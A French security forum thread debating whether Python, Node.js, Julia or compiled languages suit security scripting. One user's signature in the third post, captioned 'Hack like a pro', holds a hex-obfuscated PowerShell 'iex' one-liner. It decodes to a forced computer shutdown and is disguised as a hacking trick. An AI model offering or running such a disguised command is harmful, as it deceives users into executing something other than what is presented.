Annonce

Réduire
Aucune annonce.

[Scripting] Les langages de script pour la sécurité informatique

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [Scripting] Les langages de script pour la sécurité informatique

    Bonjour,

    Je cogitais à mes heures perdu est m'est venu une interrogation.
    La plupart des gens utilise le python pour faire du scripting et automatiser des taches. C'est vrai pour tout un tas de domaine et notamment la sécurité informatique.
    C'est à ce moment que je me suis demander... pourquoi ?
    Alors oui, le python est un langage très facile à apprendre et à utiliser, oui, il contient pleins de bibliothèques built-in mais pourquoi pas voir ailleurs ?

    J'ai essayer de penser à une alternative et je trouve que node.js est un très bon concurrent.
    Tout d'abord c'est un langage de script et se revendique en tant que tel. Il est très permissif. Il peut être utiliser pour pleins de choses différentes en même temps. Il permet de se concentrer sur la compréhension et le suivi d'un seul langage qui sert dans une multitude de domaine.

    Bref, je me demandais ce que vous en pensiez ? Ou alors préféreriez-vous un autre langage ?

  • #2
    Comme d'habitude pour ce genre de question,

    On choisit un langage selon ses besoins et pas le contraire !

    Si je dois apprendre un nouveau langage pour arriver à mes fins, je le fais. Il serait stupide d'utiliser python, si j'ai besoin de grosses performances et pourtant c'est le langage de mes débuts.

    Perso, le langage python, je l'utilise pour faire des tests algorithmiques, et j'utilise selon mes besoins un autre langage en m'appuyant sur mon code python.

    Je fais du C/C++/Java/Python/Cython/Jython/haskell/bash/Julia/php et dans tout ça je me suis toujours fait un choix assez judicieux.

    Si tu veux un bon compromis, performance et simplicité de codage, va voir du côté de Julia, il vaut le coup d'être testé... D'autres que j'ai pas testé, mais qui semble être sympas selon quelques lectures, Go, Swing, Rust et j'en passe !

    Voir du côté de Eiffel pour la POO (Programmation Orienté Objet) car c'est de là que tous les langages se sont inspirés pratiquement.

    Là plupart du temps, mon compromis pour du logiciel reste cython interfaçage C/python ou C++/python, pour du web (ce que je maîtrise le moins) php, javascript via html5.

    Bonne continuation dans tes choix ! L'important est de bien cibler tes besoins et par la suite choisir le langage qui te permettra d'y accéder le plus facilement.

    Commentaire


    • #3
      Ma vision perso :

      J'ai toujours vu python comme un outil qui permet de gagner beaucoup de temps tellement il est haut niveau / bien alimenté par des modules bien foutus (scapy powa).
      Du coup ma question à moi c'est : pourquoi je me ferrai chier avec autre chose ?
      Et ma réponse : Je fais des scripts pour faire de la sécu et non l'inverse. Je ne suis pas développeur, je ne suis pas là pour créer ou inventer, j'ai juste besoin d'avoir un outil qui répond à mes besoins en me garantissant un bon rapport effort / résultat.
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Envoyé par Krisscool Voir le message
        Du coup ma question à moi c'est : pourquoi je me ferrai chier avec autre chose ?
        Même dans la sécurité, un langage comme python peut être limité... À partir du moment où tu rencontres des boucles dans un code, il peut arriver qu'un langage de script, pas seulement python, soit inutilisable ou pas adapté.

        Il existe donc deux solutions
        1. Tu améliores l'algorithme, tu optimises au maximum avec du binding C (fonctions créés en C pour python) pour avoir de meilleures performances
        2. Tu changes ton langage de script pour un langage compilé

        Dans le 2ème cas, on le fait car on a pas d'autres moyens !

        Commentaire

        Chargement...
        X